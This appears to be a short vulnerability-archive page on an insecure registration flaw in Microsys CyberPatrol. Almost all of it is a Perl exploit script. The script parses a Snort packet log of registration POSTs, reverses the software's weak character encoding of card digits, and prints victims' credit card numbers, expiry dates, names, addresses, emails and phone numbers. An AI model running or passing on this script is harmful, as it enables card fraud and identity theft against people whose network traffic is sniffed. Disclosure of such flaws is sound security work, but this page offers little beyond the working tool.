|
Microsys CyberPatrol Insecure Registration Vulnerability
The following exploit is for use with Snort and will print the clear text information in a readable table: #!/usr/bin/perl $showline=0; open(SNORT, "log"); LINE:while($line=<SNORT>){ @field=split /\s/, $line; if($#field>0 && $#field<15){next LINE;} if(!($line=~/\w/)){ $registerinfo=~s/\%20/ /g; $registerinfo=~s/\%40/@/g; ($junk, $registerinfo)=split /\.\.\.\./, $registerinfo; @array=split /\&/, $registerinfo; if($array[0]=~/EMAIL/){print "$array[0]\n";} if($array[1]=~/CARD/){print "CARD=";} @chararray=split //, $array[1]; $arraylength=$#chararray; for($i=0; $i<$arraylength+1; ++$i){ if($chararray[$i]=~/\%/){ $checkchar="$chararray[$i]"; $checkchar.="$chararray[$i+1]"; $checkchar.="$chararray[$i+2]"; $i=$i+2; } else{$checkchar="$chararray[$i]";} if($checkchar=~/z/){print "0";} elsif($checkchar=~/{/){print "1";} elsif($checkchar=~/x/){print "2";} elsif($checkchar=~/y/){print "3";} elsif($checkchar=~/\%7E/){print "4";} elsif($checkchar=~/\./){print "5";} elsif($checkchar=~/\|/){print "6";} elsif($checkchar=~/\}/){print "7";} elsif($checkchar=~/r/){print "8";} elsif($checkchar=~/s/){print "9";} } if($array[2]=~/EXP/){print "\n$array[2]\n";} if($array[3]=~/NAME/){print "$array[3]\n";} if($array[4]=~/ADDR1/){print "$array[4]\n";} if($array[5]=~/ADDR2/){print "$array[5]\n";} if($array[6]=~/CITY/){print "$array[6]\n";} if($array[7]=~/PHONE/){print "$array[7]\n\n\n";} $registerinfo=""; $showline=0; } if($line=~/POST/){$showline=1} if($showline eq 1){ ($junk, $line)=split / /, $line; chomp($line); $registerinfo.=$line; } } |
|
|
Privacy Statement |
